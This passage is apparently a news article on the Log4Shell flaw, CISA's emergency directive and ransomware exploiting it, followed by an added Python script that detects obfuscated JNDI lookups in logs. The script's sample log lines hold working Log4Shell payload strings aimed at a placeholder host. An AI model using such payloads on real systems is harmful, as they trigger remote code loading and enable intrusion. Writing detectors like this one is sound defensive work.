Federal agencies have particular vulnerabilities due to their reliance on legacy technology and have often failed to patch and supply timely security updates to existing systems.
“The CISA emergency directive is important because many agencies at the U.S. government have been slow to patch and a vulnerability like Log4Shell can have lasting effects if not properly addressed quickly,” Koehler said. 
Koehler cited an August 2021 report from the Senate Committee on Homeland Security and Government Affairs, which noted that six agencies had failed to install patches and take other important measures two years after a 2019 report from the inspector general.
Seven agencies used legacy systems or applications that were no longer being supported with security updates, according to the report from Sens. Rob Portman, R-Ohio, and Gary Peters, D-Mich.
The concerns about Log4Shell are rising amid reports that threat actors are deploying Conti ransomware and installing cryptominers on vulnerable systems, Koehler said. 
Similar to the Microsoft Exchange attacks earlier this year, the threats related to Log4Shell are escalating from the initial set of probes and coin mining, to exfiltration and ransomware, said Saumitra Das, CTO and co-founder of Blue Hexagon. 
“Since ransomware initial access brokers typically already have foothold infections in enterprises, I fully expect them to scan internal hosts for Log4j vulnerabilities and use it to spread and deploy ransomware,” Das said. 
Organizations should not limit their search for signs of exploitation to external-facing locations but should also check internal hosts and cloud environments. Log4j has also been used to steal cloud credentials such as AWS keys, Das said.
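The recommendation above, to hunt for exploitation attempts internally as well as at the perimeter, is easiest to act on with a small log-scanning check. The following is an added example, not code from the article or from any vendor it quotes: it normalizes the nested Log4j lookup syntax that attackers use to disguise the `${jndi:` trigger (lower/upper lookups and `:-` default values) and then reports which lines carry a JNDI lookup and which protocol it points at. The log lines are constructed for the example and use `example.invalid` hostnames; the function and pattern names are this example's own.

```python
import re
from typing import List, Tuple

# Constructed sample access-log lines (not taken from the article): one benign
# request, one plain JNDI lookup, one obfuscated with nested lookups, and one
# with mixed case. Hosts use the reserved .invalid TLD.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [11/Dec/2021:10:12:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [11/Dec/2021:10:12:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - [11/Dec/2021:10:12:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${::-l}dap://example.invalid/b}"',
    '10.0.0.9 - - [11/Dec/2021:10:12:11 +0000] "POST /api HTTP/1.1" 200 512 "-" "${jNdI:rmi://example.invalid/c}"',
]

# ${lower:X} / ${upper:X} resolve to X (case is folded later anyway).
_LOWER_UPPER = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
# ${name:-default} with an unknown or empty name resolves to the default text.
_DEFAULT_VALUE = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# The actual trigger: ${jndi:<protocol>:...}
_JNDI = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Collapse nested Log4j lookup syntax so obfuscated variants resolve to
    their plain form. Innermost lookups contain no braces, so each round
    resolves one nesting level; the round limit bounds work on hostile input."""
    for _ in range(max_rounds):
        new = _LOWER_UPPER.sub(lambda m: m.group(1), text)
        new = _DEFAULT_VALUE.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def find_jndi_lookups(lines) -> List[Tuple[int, str]]:
    """Return (1-based line number, protocol) for every line that carries a
    JNDI lookup after normalization."""
    hits: List[Tuple[int, str]] = []
    for idx, line in enumerate(lines, start=1):
        match = _JNDI.search(normalize_lookups(line))
        if match:
            hits.append((idx, match.group(1).lower()))
    return hits


if __name__ == "__main__":
    for line_no, proto in find_jndi_lookups(SAMPLE_LOG_LINES):
        print(f"line {line_no}: JNDI lookup via {proto}")
```

Run the same function over internal application logs, not only edge-proxy logs, since the quoted warning is about lateral movement from hosts that are already compromised; treat a hit as a signal to triage the originating host and any outbound LDAP or RMI connections it made, not as proof of successful exploitation.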
Subscribe to Cybersecurity Dive for top news, trends & analysis